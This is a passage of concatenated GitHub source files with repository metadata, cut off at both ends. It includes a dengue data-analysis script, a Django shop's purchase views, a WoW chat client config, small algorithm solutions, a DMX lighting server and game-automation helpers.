hemorragica\n\testados.loc[(estados.uf == estado), 'media_casos_hemorragica'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].casos_hemorragica)\n\testados.loc[(estados.uf == estado), 'std_casos_hemorragica'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].casos_hemorragica, ddof=1)\n\n\t# obitos hemorragica\n\testados.loc[(estados.uf == estado), 'media_obitos_hemorragica'] =\\\n\t\tmean(dfDengue[dfDengue.uf == estado].taxa_obito_hemorragica)\n\testados.loc[(estados.uf == estado), 'std_obitos_hemorragica'] =\\\n\t\tstd(dfDengue[dfDengue.uf == estado].taxa_obito_hemorragica, ddof=1)\n\n# plots\nx = asarray(range(0, len(estados.uf))) * 1.5\n\n# errorbar para a densidade de medicos\nerrorbar(x, estados.media_medicos, yerr=estados.std_medicos,\\\n\tfmt='s', markersize=10, color='#347DEB', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de densidade de medicos')\nxlabel('estado')\nylabel('medico/mil hab.')\nsavefig('graficos/@error-bar-media-medicos.png')\nclf()\n\n# errorbar para a densidade de leitos\nerrorbar(x, estados.media_leitos, yerr=estados.std_leitos,\\\n\tfmt='s', markersize=10, color='#124FEB', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de densidade de leitos')\nxlabel('estado')\nylabel('leito/mil hab.')\nsavefig('graficos/@error-bar-media-leitos.png')\nclf()\n\n# errorbar para casos de dengue\nerrorbar(x, estados.media_dengue_cem_mil_hab, yerr=estados.std_dengue_cem_mil_hab,\\\n\tfmt='s', markersize=10, color='#1156EB', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de taxa de casos de dengue')\nxlabel('estado')\nylabel('casos de dengue/cem mil hab.')\nsavefig('graficos/@error-bar-media-dengue.png')\nclf()\n\n# errorbar para casos de hemorragica\nerrorbar(x, estados.media_casos_hemorragica, yerr=estados.std_casos_hemorragica,\\\n\tfmt='s', markersize=10, color='#A052EF', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de casos de dengue hemorragica')\nxlabel('estado')\nylabel('numero de casos de dengue hemorragica')\nsavefig('graficos/@error-bar-casos-hemorragica.png')\nclf()\n\n# errorbar para obitos hemorragica\nerrorbar(x, estados.media_obitos_hemorragica, yerr=estados.std_obitos_hemorragica,\\\n\tfmt='s', markersize=10, color='black', alpha=0.7)\nxticks(x, asarray(estados.uf))\nmargins(0.05)\ntitle('media anual de taxa de obito devido a dengue hemorragica')\nxlabel('estado')\nylabel('taxa de obito devido a dengue hemorragica')\nsavefig('graficos/@error-bar-obitos-hemorragica.png')\nclf()\n\n# lista de anos\nq = \"\"\"\n\tSELECT ano, uf FROM dfDengue\n\t\tWHERE ano >= 1994 AND ano <= 2013\n\t\tGROUP BY ano\n\t\"\"\"\n\nanos = sqldf(q, globals())\n\n# verificar tendencia de subida da taxa de casos de dengue\nfor estado in estados.uf:\n\tx = anos.ano\n\ty = dfDengue[(dfDengue.ano >= 1994) &\\\n\t\t(dfDengue.ano <= 2013) &\\\n\t\t(dfDengue.uf == estado)].dengue_cem_mil_hab\n\tx = asarray(x)\n\ty = asarray(y)\n\tm, b = linreg(x, y)\n\tprint('{}: m_dengue = {}'.format(estado, m))\n\n\ty = dfDengue[(dfDengue.ano >= 1994) &\\\n\t\t(dfDengue.ano <= 2013) &\\\n\t\t(dfDengue.uf == estado)].taxa_obito_hemorragica\n\ty = asarray(y)\n\tm, b = linreg(x, y)\n\tprint('{}: m_hemorragica = {}'.format(estado, m))\n\n# escrever dataframe para depois agrupar\nestadosToCsv = estados[['uf', 'media_medicos', 'std_medicos',\\\n\t'media_leitos', 'std_leitos', 'media_dengue_cem_mil_hab', 'std_dengue_cem_mil_hab',\\\n\t'media_obitos_hemorragica', 'std_obitos_hemorragica']]\nestadosToCsv.to_csv('dados/to-kmeans.csv', index=False)\n","repo_name":"vasconcelose/dengue-ufs","sub_path":"wrangle.py","file_name":"wrangle.py","file_ext":"py","file_size_in_byte":4711,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11618775253","text":"import sys\r\nfrom collections import deque\r\n\r\nN = int(input())\r\nS = \".\" + input()\r\ngraph = [[] for _ in range(N+1)]\r\n\r\nfor _ in range(N-1):\r\n A = list(map(int, sys.stdin.readline().split())) \r\n graph[A[1]].append(A[0])\r\n graph[A[0]].append(A[1])\r\n\r\n\r\nhandle = []\r\nQ = deque()\r\nvisited = [False]*(N+1)\r\ndef bfs():\r\n Q.append([1,0]) # 0 = node번호, 1 = level (0부터 시작)\r\n handle.append(ord(S[1])-96)\r\n visited[1] = True\r\n while len(Q) != 0: \r\n u = Q.popleft()\r\n for v in graph[u[0]]:\r\n if visited[v] == True:\r\n continue\r\n visited[v] = True\r\n if u[1] != 0 and ord(S[u[0]])-96 != handle[u[1]]:\r\n break\r\n if len(handle) == u[1]+1:\r\n handle.append(ord(S[v])-96)\r\n else:\r\n handle[u[1]+1] = max(handle[-1], ord(S[v])-96)\r\n Q.append([v,u[1]+1]) \r\n #print(Q)\r\n \r\nbfs()\r\nfor i in range(len(handle)):\r\n print(chr(handle[i]+96), end = \"\")\r\n","repo_name":"KongUm/BOJ","sub_path":"백준/Gold/25498. 핸들 뭘로 하지/핸들 뭘로 하지.py","file_name":"핸들 뭘로 하지.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5299341239","text":"\n\"\"\" SHOP VIEWS \"\"\"\n\nimport qrcode\n\nfrom django.shortcuts import render, redirect\nfrom django.views import View\nfrom django.contrib import messages\nfrom django.utils import timezone\n\nfrom shop.forms.purchase_create_form import PurchaseCreateForm\nfrom bank.models import BankAccount\n\nfrom bank.currency_converter import currency_converter\n\nfrom shop.models import (\n Category,\n Product,\n Purchase\n)\nfrom shop.product_generator import *\n\ndef shop_page(request): # главная страница приложения МАГАЗИН\n try:\n if request.user.is_authenticated:\n user = request.user\n products = Product.objects.all().order_by('rating')\n return render(\n template_name='shop.html',\n request=request,\n context = {\n 'user': user,\n 'products': products\n }\n )\n else:\n products = Product.objects.all().order_by('rating')\n return render(\n template_name='shop.html',\n request=request,\n context = {\n 'products': products\n }\n )\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('done/')\n \ndef catalog_page(request): # каталог приложения МАГАЗИН\n try:\n if request.user.is_authenticated:\n user = request.user\n categories = Category.objects.all().order_by('name')\n return render(\n template_name='catalog.html',\n request=request,\n context = {\n 'user': user,\n 'categories': categories\n }\n )\n else:\n categories = Category.objects.all().order_by('name')\n return render(\n template_name='catalog.html',\n request=request,\n context = {\n 'categories': categories\n }\n )\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n\nclass DoneView(View):\n\n \"\"\" СТРАННИЦА О СТАТУСЕ ОПЕРАЦИЙ. \"\"\"\n\n template_name = 'done.html'\n\n def get(self, request):\n return render(request, self.template_name)\n\nclass ProductsPageView(View):\n\n \"\"\" СТРАННИЦА ОБЗОРА ВСЕХ ТОВАРОВ ОДНОЙ КАТЕГОРИИ. \"\"\"\n\n template_name = 'products.html'\n\n def get(self, request, *args, **kwargs):\n try:\n pk = kwargs.get('pk', None)\n category = Category.objects.get(pk=pk)\n products = Product.objects.filter(category=category)\n return render(\n request, \n self.template_name, \n context = {'pk': pk, 'products': products, 'category': category})\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n\nclass ProductPageView(View):\n\n \"\"\" СТРАННИЦА ОБЗОРА ОДНОГО ТОВАРА. \"\"\"\n\n template_name = 'product.html'\n\n def get(self, request, *args, **kwargs):\n try:\n if request.user.is_authenticated:\n user = request.user\n pk = kwargs.get('pk', None)\n product = Product.objects.get(pk=pk)\n # product = Product.objects.filter(category=category)\n return render(\n request, \n self.template_name, \n context = {'pk': pk, 'user': user, 'product': product}\n )\n else:\n return redirect('/bank/login/')\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n \nclass PurchaseSuccessView(View):\n\n \"\"\" СТРАННИЦА О СТАТУСЕ ПОКУПКИ. \"\"\"\n\n template_name = 'purchase_done.html'\n\n def get(self, request, *args, **kwargs):\n return render(request, self.template_name)\n\n\n# ГЕНЕРАТОР кодов для QRкода\ndef qrcode_generator():\n code = random.randint(100, 999)\n return code\n\nclass PurchaseProductView(View):\n\n \"\"\" СТРАННИЦА СОВЕРШЕНИЯ ПОКУПКИ (тип. КОРЗИНА). \"\"\"\n\n template_name = 'purchase.html'\n\n def get(self, request, *args, **kwargs):\n try:\n form = PurchaseCreateForm(user=request.user)\n qr_image = False\n if request.user.is_authenticated:\n user = request.user\n pk = kwargs.get('pk', None)\n product = Product.objects.get(pk=pk)\n qr_data = qrcode_generator()\n img = qrcode.make(qr_data)\n type(img)\n print('data created')\n try:\n img.save(\"apps/shop/static/qr/test.jpg\")\n request.session['qr_code'] = qr_data # сохраняем QR код в сессию для сверки в дальнейшем\n print('img created')\n qr_image = True\n except Exception as e:\n print(f\"Ошибка сохранения изображения: {e}\")\n qr_image = False\n return render(\n request, \n self.template_name, \n context = {'pk': pk, 'user': user, 'product': product, 'form': form, 'qr_image': qr_image}\n )\n else:\n return redirect('login/')\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')\n \n def post(self, request, *args, **kwargs):\n try:\n form = PurchaseCreateForm(request.POST, user=request.user)\n print('покапка 01') # удали\n if request.user.is_authenticated:\n if form.is_valid():\n print('покупка 02') # удали\n user = request.user #?\n qr_code = request.session.get('qr_code')\n pk = kwargs.get('pk', None)\n product = Product.objects.get(pk=pk)\n QRcode = form.cleaned_data['QRcode'] # вытаскиваем QR код из сессии для сверки\n quantity = form.cleaned_data['quantity']\n price = product.price*quantity\n bankaccount = form.cleaned_data['BankAccount']\n inaccount = BankAccount.objects.get(iban='7777777777777777') # МАГАЗИН продумай - ибан банка изменится в другой базе\n obj_BankAccount = BankAccount.objects.get(pk=bankaccount.pk)\n inst = int(form.cleaned_data['my_field'])\n converted_price = currency_converter(price, 'KZT', obj_BankAccount.currency)\n # converted_balance = currency_converter(bankaccount.balance, obj_BankAccount.currency, 'KZT')\n # if inst == 'option1' and obj_BankAccount.type == 'Gold': # Логика покупки, если без рассрочки и каспи ГОЛД\n if inst == 0: # Логика покупки, если без рассрочки\n if obj_BankAccount.balance < converted_price:\n messages.error(request, 'Недостаточно средств на счете списания.')\n return redirect('success/')\n elif product.quantity < quantity:\n messages.error(request, 'Количество товара в наличии не достаточно.')\n return redirect('success/')\n elif str(QRcode) != str(qr_code): # сверяем значения введенного и актуального QR кодов\n messages.error(request, 'Не верно указан код.')\n return redirect('success/')\n else:\n obj_BankAccount.balance -= converted_price\n product.quantity -= quantity\n inaccount.balance += price\n inaccount.save()\n obj_BankAccount.save() # Сохраняем изменения баланса в базе данных\n product.save() # Сохраняем изменения количества товара в базе данных\n Purchase.objects.create(\n user=user,\n product=product,\n quantity=quantity,\n price=price,\n iban=bankaccount.iban,\n purchase_type='Cash',\n )\n elif inst != 0: # Логика покупки, c рассрочкой N месяц\n if obj_BankAccount.balance < converted_price:\n messages.error(request, 'Недостаточно средств на счете списания.')\n return redirect('success/')\n elif product.quantity < quantity:\n messages.error(request, 'Количество товара в наличии не достаточно.')\n return redirect('success/')\n elif str(QRcode) != str(qr_code): # сверяем значения введенного и актуального QR кодов\n messages.error(request, 'Не верно указан код.')\n return redirect('success/')\n else:\n print('покупка 03 рассрочка') # удали\n product.quantity -= quantity\n obj_BankAccount.save() # Сохраняем изменения баланса в базе данных\n product.save() # Сохраняем изменения количества товара в базе данных\n print('04') # удали\n Purchase.objects.create(\n user=user,\n product=product,\n quantity=quantity,\n price=price,\n iban=bankaccount.iban,\n purchase_type='Inst',\n inst_duration=inst,\n monthly_payment=(price/inst),\n # next_pay_date=timezone.now() + timezone.timedelta(days=30), # период в днях\n next_pay_date=timezone.now() + timezone.timedelta(minutes=5), # настрой единый период??\n remaining_amount=price\n )\n messages.success(request, 'Покупка успешно выполнена.') \n return redirect('success/')\n else:\n return redirect('login/') \n return redirect('success/')\n except Exception as e:\n messages.error(request, f'Что то пошло не так. Ошибка: {e}')\n return redirect('/shop/done/')","repo_name":"Vassaga/kaspi","sub_path":"apps/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12151,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41780798530","text":"import logging\nimport os\nimport datetime\nimport sys\nimport dotenv\n\nfrom src.common.commonclasses import Character, Guild, LogonInfo, Calendar\nfrom src.header_crypt import GameHeaderCrypt\nfrom src.packet_codes import Codes\n\nimport lxml.objectify\n\n\nclass Globals:\n\n def __init__(self):\n\n dotenv.load_dotenv('./.env')\n\n with open(os.path.join(os.path.dirname(sys.argv[0]), 'config.xml'), 'r', encoding='utf-8') as xml_file:\n xml_obj = lxml.objectify.fromstring(xml_file.read())\n self.reset()\n self.logger = self.get_logger(xml_obj.logger)\n self.logon_info = self.get_logon_info(xml_obj)\n self.timezone = datetime.timezone(datetime.timedelta(hours=3), 'Moscow')\n self.reconnect_delay = int(xml_obj.wow.reconnect_delay)\n self.db = str(xml_obj.discord.db)\n self.token = os.environ.get('DISCORD_TOKEN')\n self.server_MOTD_enabled = bool(xml_obj.wow.server_motd_enabled)\n self.codes = Codes()\n self.maps = {self.codes.chat_channels.get_from_str(x.tag.upper()): x for x in\n xml_obj.discord.channels.getchildren()}\n self.guild_events = {self.codes.guild_events.get_from_str(e.tag.upper()): bool(e) for e in\n xml_obj.guild_events.getchildren()}\n\n self.logger.debug('Config values:\\n\\t'\n f'account = {self.logon_info.account}\\n\\t'\n f'password = {self.logon_info.password}\\n\\t'\n f'platform = {self.logon_info.platform}\\n\\t'\n f'locale = {self.logon_info.locale}\\n\\t'\n f'expansion = {self.logon_info.expansion}\\n\\t'\n f'version = {self.logon_info.version}\\n\\t'\n f'build = {self.logon_info.build}\\n\\t'\n f'host = {self.logon_info.address.host}\\n\\t'\n f'port = {self.logon_info.address.port}\\n\\t'\n f'realm = {self.logon_info.address.name}')\n\n @staticmethod\n def get_logon_info(xml_obj):\n logon_info = LogonInfo()\n logon_info.account = os.environ.get('WOW_ACC').upper()\n logon_info.password = os.environ.get('WOW_PASS').upper()\n logon_info.address.name = os.environ.get('WOW_REALM')\n logon_info.address.parse(os.environ.get('WOW_LOGON'))\n logon_info.version = str(xml_obj.wow.version)\n logon_info.platform = str(xml_obj.wow.platform)\n logon_info.locale = str(xml_obj.wow.locale)\n return logon_info\n\n @staticmethod\n def get_logger(logger_cfg):\n logger = logging.getLogger(str(logger_cfg.name) if logger_cfg.name else 'app')\n try:\n log_level = getattr(logging, str(logger_cfg.level).upper())\n logger.setLevel(log_level)\n except ValueError or AttributeError:\n logger.setLevel(logging.DEBUG)\n handlers = []\n if logger_cfg.to_file:\n now = datetime.datetime.now()\n filename = f'PyWowChat_{now.date()}_{now.time().hour}-{now.time().minute}-{now.time().second}.log'\n path = os.path.join(os.path.dirname(sys.argv[0]), 'logs', filename)\n handlers.append(logging.FileHandler(path))\n if logger_cfg.to_stdout:\n handlers.append(logging.StreamHandler(sys.stdout))\n log_format = str(logger_cfg.format)\n for handler in handlers:\n handler.setFormatter(logging.Formatter(log_format))\n logger.addHandler(handler)\n return logger\n\n def reset(self):\n self.character = Character(name=os.environ.get('WOW_CHAR'))\n self.guild = Guild()\n self.players = {}\n self.calendar = Calendar()\n self.realm = None\n self.crypt = GameHeaderCrypt()\n\n\nglob = Globals()\n","repo_name":"Anarom/PyWowChat","sub_path":"src/common/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42330029118","text":"import streamlit as st\r\nimport numpy as np\r\n\r\n# Define the calculator function\r\ndef calculate(a, b, op):\r\n if op == \"+\":\r\n return a + b\r\n elif op == \"-\":\r\n return a - b\r\n elif op == \"*\":\r\n return a * b\r\n elif op == \"/\":\r\n if b == 0:\r\n raise ZeroDivisionError(\"Cannot divide by zero\")\r\n return a / b\r\n else:\r\n raise ValueError(\"Invalid operator\")\r\n\r\n# Define the Streamlit app\r\nst.title(\"Calculator\")\r\n\r\n# Get user input\r\na = st.number_input(\"First number\")\r\nb = st.number_input(\"Second number\")\r\nop = st.selectbox(\"Operator\", [\"+\", \"-\", \"*\", \"/\"])\r\n\r\n# Calculate the result\r\ntry:\r\n result = calculate(a, b, op)\r\nexcept ZeroDivisionError as e:\r\n st.error(e)\r\nelse:\r\n st.write(\"Result:\", result)\r\n\r\n# Add more operations\r\nst.markdown(\"Additional operations:\")\r\n\r\n# Square root\r\nsqrt = np.sqrt(a)\r\nst.write(\"Square root of {}: {}\".format(a, sqrt))\r\n\r\n# Logarithm\r\nlog = np.log(a)\r\nst.write(\"Logarithm of {}: {}\".format(a, log))\r\n\r\n# Exponential\r\nexp = np.exp(a)\r\nst.write(\"Exponential of {}: {}\".format(a, exp))\r\n","repo_name":"aniruddhasalve/simple-streamlit-calculator-demo","sub_path":"calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6873844058","text":"from collections import defaultdict\n\nclass Solution:\n def isIsomorphic(self, s: str, t: str) -> bool:\n dic = defaultdict(str)\n visited = []\n\n for a, b in zip(s, t):\n if dic[a] == '':\n if b in visited:\n return False\n dic[a] = b\n visited.append(b)\n continue\n elif dic[a] == b:\n continue\n return False\n \n return True\n","repo_name":"headF1rst/leetcode-daily-brain-exercise","sub_path":"0205-isomorphic-strings/0205-isomorphic-strings.py","file_name":"0205-isomorphic-strings.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42041233405","text":"import random\nglobal x,y\nalpha = [\"A\",\"B\",\"C\",\"D\",\"E\",\"F\",\"G\",\"H\",\"I\",\"J\",\"K\",\"L\",\"M\",\"N\",\"O\",\"P\",\"Q\",\"R\",\"S\",\"T\",\"U\",\"V\",\"W\",\"X\",\"Y\",\"Z\"]\nx = 10\ny = 2\n\ndef main():\n print(\"対象文字\")\n for i in range(10):\n x.append(alpha[random.sample(alpha,25)])\n print(x)\n print(\"表示文字\")\n for j in range(8):\n y.append(x[random.randint(0,9)])\n print(y)","repo_name":"c0a21148/ProjExd","sub_path":"Ex01/alphabet.py","file_name":"alphabet.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"30235907474","text":"\n# https://leetcode.com/problems/palindrome-number/description/\n\ndef palindrome(s):\n news = str(s)\n print(news, news[::-1])\n return news == news[::-1]\n\n\n# https://leetcode.com/problems/palindrome-linked-list/description/\nclass Node:\n def __init__(self, x, next = None):\n self.x = x\n self.next = next\n\nclass Solution:\n def isPalindrome(self, head):\n if not head or head.next is None:\n return True\n temp = []\n is_palindrome = False\n\n while head != None:\n temp.append(head.x)\n head = head.next\n \n if temp == temp[::-1]:\n is_palindrome = True\n return is_palindrome\n\n\nif __name__ == '__main__':\n print('PALINDROME')\n s = -121\n print(palindrome(s))\n print()\n \n print('NODE')\n head = Node(1, Node(2, Node(2, Node(1))))\n s = Solution()\n print(s.isPalindrome(head))\n\n\n\n\n\n\n \n","repo_name":"goldensky/Tasks-Python-","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69938381229","text":"import socketio\nimport eventlet\nimport eventlet.wsgi\nfrom flask import Flask\nimport SWHear\nimport numpy\n\nfrom pyenttec import DMXConnection\nsio = socketio.Server()\napp = Flask(__name__)\n\near = SWHear.SWHear(rate=44100,updatesPerSecond=20)\near.stream_start()\n\nd = DMXConnection(u'/dev/tty.usbserial-6A2I3O5P')\n\nclass DMXFrame(object):\n def __init__(self, dmx, ear):\n self.dmx = dmx\n self.ear = ear\n\n def render(self):\n self.dmx.render()\n\n def blackout(self):\n self.dmx.blackout()\n\n #BOBBY PAR\n # 1 func, 2 255 (rgbw), 3 spd, 4 main, 5-8 rgbw\n def set_pixel_a(self, dmx_id, red, green, blue, white):\n self.dmx.dmx_frame[dmx_id+0] = int(numpy.average(self.ear.fft) % 255)\n self.dmx.dmx_frame[dmx_id+2] = 255\n self.dmx.dmx_frame[dmx_id+3] = red\n self.dmx.dmx_frame[dmx_id+4] = green\n self.dmx.dmx_frame[dmx_id+5] = blue\n self.dmx.dmx_frame[dmx_id+6] = white\n\n #CLAY PAR\n # :dimmer, :strobe, :control, :speed, :red, :green, :blue, :white\n def set_pixel_b(self, dmx_id, red, green, blue, white):\n if dmx_id != 0:\n dmx_id = dmx_id - 1\n self.dmx.dmx_frame[dmx_id] = int(numpy.average(self.ear.fft) % 255)\n self.dmx.dmx_frame[dmx_id+1] = 0\n self.dmx.dmx_frame[dmx_id+2] = 0\n self.dmx.dmx_frame[dmx_id+3] = 0\n self.dmx.dmx_frame[dmx_id+4] = red\n self.dmx.dmx_frame[dmx_id+5] = green\n self.dmx.dmx_frame[dmx_id+6] = blue\n self.dmx.dmx_frame[dmx_id+7] = white\n\n #SET BARS\n #1-3 RGB, 4-6, RGB, 7-9 RGB 10 master\n def set_pixel_bar_a(self,dmx_id, red, green, blue, amber):\n self.dmx.dmx_frame[dmx_id] = red\n self.dmx.dmx_frame[dmx_id+1] = green\n self.dmx.dmx_frame[dmx_id+2] = blue\n self.dmx.dmx_frame[dmx_id+3] = amber\n self.dmx.dmx_frame[dmx_id+9] = int(numpy.average(self.ear.fft) % 255) \n\n def set_pixel_bar_b(self,dmx_id, red, green, blue, amber):\n self.dmx.dmx_frame[dmx_id+4] = red\n self.dmx.dmx_frame[dmx_id+5] = green\n self.dmx.dmx_frame[dmx_id+6] = blue\n self.dmx.dmx_frame[dmx_id+7] = amber \n self.dmx.dmx_frame[dmx_id+9] = int(numpy.average(self.ear.fft) % 255) \n\ndef send_pixel(data):\n f = DMXFrame(dmx=d, ear=ear)\n\n for num, rgb_tuple in enumerate(data):\n dmx_id = num * 10\n\n #print(\"setting pixel: {} {}\".format(dmx_id, rgb_tuple))\n \n if num < 4:\n f.set_pixel_b(dmx_id,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n if num > 3 and num < 8:\n f.set_pixel_a(dmx_id,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n if num == 8:\n f.set_pixel_bar_a(199,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n f.set_pixel_bar_b(199,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n if num == 9:\n f.set_pixel_bar_a(249,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n f.set_pixel_bar_b(249,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2],100)\n\n #f.set_pixel_b(dmx_id,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(40,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(50,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(60,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n # f.set_pixel_a(70,rgb_tuple[0],rgb_tuple[1],rgb_tuple[2], 0)\n f.render()\n # port.dmx_frame[42] = 255 # strobe in combo with ch1\n # port.dmx_frame[43] = rgb_tuple[0]\n # port.dmx_frame[44] = rgb_tuple[1]\n # port.dmx_frame[45] = rgb_tuple[2]\n # port.dmx_frame[46] = 0 #rgb_tuple[2]\n #port.render()\n\n@sio.on('connect', namespace='/chat')\ndef connect(sid, environ):\n print(\"connect \", sid)\n\n@sio.on('chat message', namespace='/chat')\ndef message(sid, data):\n #print(\"message \", data)\n send_pixel(data)\n\n@sio.on('disconnect', namespace='/chat')\ndef disconnect(sid):\n print('disconnect ', sid)\n\nif __name__ == '__main__':\n # wrap Flask application with engineio's middleware\n app = socketio.Middleware(sio, app)\n\n # deploy as an eventlet WSGI server\n eventlet.wsgi.server(eventlet.listen(('', 9000)), app)\n","repo_name":"Iteratix/pixels","sub_path":"flask_server_par.py","file_name":"flask_server_par.py","file_ext":"py","file_size_in_byte":4100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13604928676","text":"\"\"\"\nSophisticated training noise.\n\"\"\"\n\nfrom vocabulary import wordmap\n\nfrom common.myrandom import build\nimport sys\n\n_indexed_weights = None\ndef indexed_weights():\n import common.hyperparameters, common.options\n HYPERPARAMETERS = common.hyperparameters.read(\"language-model\")\n global _indexed_weights\n if _indexed_weights is not None:\n return _indexed_weights\n print >> sys.stderr, wordmap.len, \"=?=\", HYPERPARAMETERS[\"MONOLINGUAL_VOCABULARY_SIZE\"]\n assert wordmap.len == HYPERPARAMETERS[\"MONOLINGUAL_VOCABULARY_SIZE\"]\n if HYPERPARAMETERS[\"NGRAM_FOR_TRAINING_NOISE\"] == 0:\n _indexed_weights = [1 for id in range(wordmap.len)]\n elif HYPERPARAMETERS[\"NGRAM_FOR_TRAINING_NOISE\"] == 1:\n from common.json import load\n from common.file import myopen\n ngrams_file = HYPERPARAMETERS[\"NGRAMS\"][(HYPERPARAMETERS[\"NGRAM_FOR_TRAINING_NOISE\"], HYPERPARAMETERS[\"MONOLINGUAL_VOCABULARY_SIZE\"])]\n print >> sys.stderr, \"Reading ngrams from\", ngrams_file, \"...\"\n from collections import defaultdict\n ngramcnt = defaultdict(int)\n for (ngram, cnt) in load(myopen(ngrams_file)):\n assert len(ngram) == 1\n ngramcnt[ngram[0]] = cnt + HYPERPARAMETERS[\"TRAINING_NOISE_SMOOTHING_ADDITION\"]\n _indexed_weights = [ngramcnt[wordmap.str(id)] for id in range(wordmap.len)]\n _indexed_weights = build(_indexed_weights)\n else: assert 0\n return _indexed_weights\n","repo_name":"turian/neural-language-model","sub_path":"scripts/monolingual/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":180,"dataset":"github-code","pt":"37"} +{"seq_id":"18145264167","text":"from flask import Flask\nfrom flask_cors import CORS\n\nfrom api.finetuning import FineTuningSubmit, FineTuningStart\nfrom api.measurements import MeasurementsApi\nimport yaml\n\nfrom extensions import api\n\ndef create_app():\n print(\"Initializing app\")\n with open(\"resources/config.yaml\", \"r\") as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n\n app = Flask(__name__)\n CORS(app)\n api.add_resource(MeasurementsApi, '/measurements')\n api.add_resource(FineTuningSubmit, '/tuning/submit')\n api.add_resource(FineTuningStart, '/tuning/start')\n api.init_app(app)\n return app\n\nif __name__ == '__main__':\n app = create_app()\n app.run(debug=True, port=5000, host='0.0.0.0')\n","repo_name":"petros94/activity-recognition-app","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"21624458899","text":"#!/usr/bin/env python3\n\n\"\"\"\nhttps://adventofcode.com/2022/day/6\n\nUsage: cat advent06.input | python3 ./advent06.py\n\n\"\"\"\n\nSTART_OF_PACKET_MARKER_LENGTH = 4\nSTART_OF_MESSAGE_MARKER_LENGTH = 14\n\nimport sys\n\ndef main ():\n input = sys.stdin.read().strip()\n print (find_uniq_marker(START_OF_PACKET_MARKER_LENGTH, input))\n print (find_uniq_marker(START_OF_MESSAGE_MARKER_LENGTH, input))\n\ndef find_uniq_marker (length, input):\n for n in range(len(input) - length):\n if len(set(input[n:n+length])) == length:\n return n+length\n\nif __name__ == '__main__':\n main()\n","repo_name":"rolmo/adventofcode","sub_path":"advent06.py","file_name":"advent06.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"92924242","text":"import math\n\nimport pyautogui\n\nimport osrs.server as server\n\n\ndef find_closest_npc(npcs, ignore=-1):\n closest = {\n \"dist\": 999,\n \"x\": None,\n \"y\": None,\n \"id\": None\n }\n for npc in npcs:\n if npc['id'] != ignore and npc[\"dist\"] < closest[\"dist\"]:\n closest = npc\n return closest\n\n\ndef select_chat_option(chat_options, phrase):\n if not chat_options:\n return -1\n for i, option in enumerate(chat_options):\n if phrase in option:\n return i\n return -1\n\n\ndef generate_game_tiles_in_coords(x_min, x_max, y_min, y_max, z, port='56799'):\n tiles = []\n for x in range(x_min, x_max + 1):\n for y in range(y_min, y_max + 1):\n tiles.append('{},{},{}'.format(x, y, z))\n return tiles\n\n\ndef generate_surrounding_tiles(dist, port='56799'):\n player_loc = server.get_world_location(port)\n tiles = []\n for x in range(player_loc['x'] - dist, player_loc['x'] + dist):\n for y in range(player_loc['y'] - dist, player_loc['y'] + dist):\n tiles.append('{},{},{}'.format(x, y, player_loc['z']))\n return tiles\n\n\ndef find_closest_target(targs):\n closest = {\n \"dist\": 999,\n \"x\": None,\n \"y\": None,\n \"id\": None\n }\n for targ in targs:\n if int(targ[\"dist\"]) < int(closest[\"dist\"]):\n closest = targ\n return closest\n\n\ndef find_an_npc(npcs, min_dist):\n closest = {\n \"dist\": 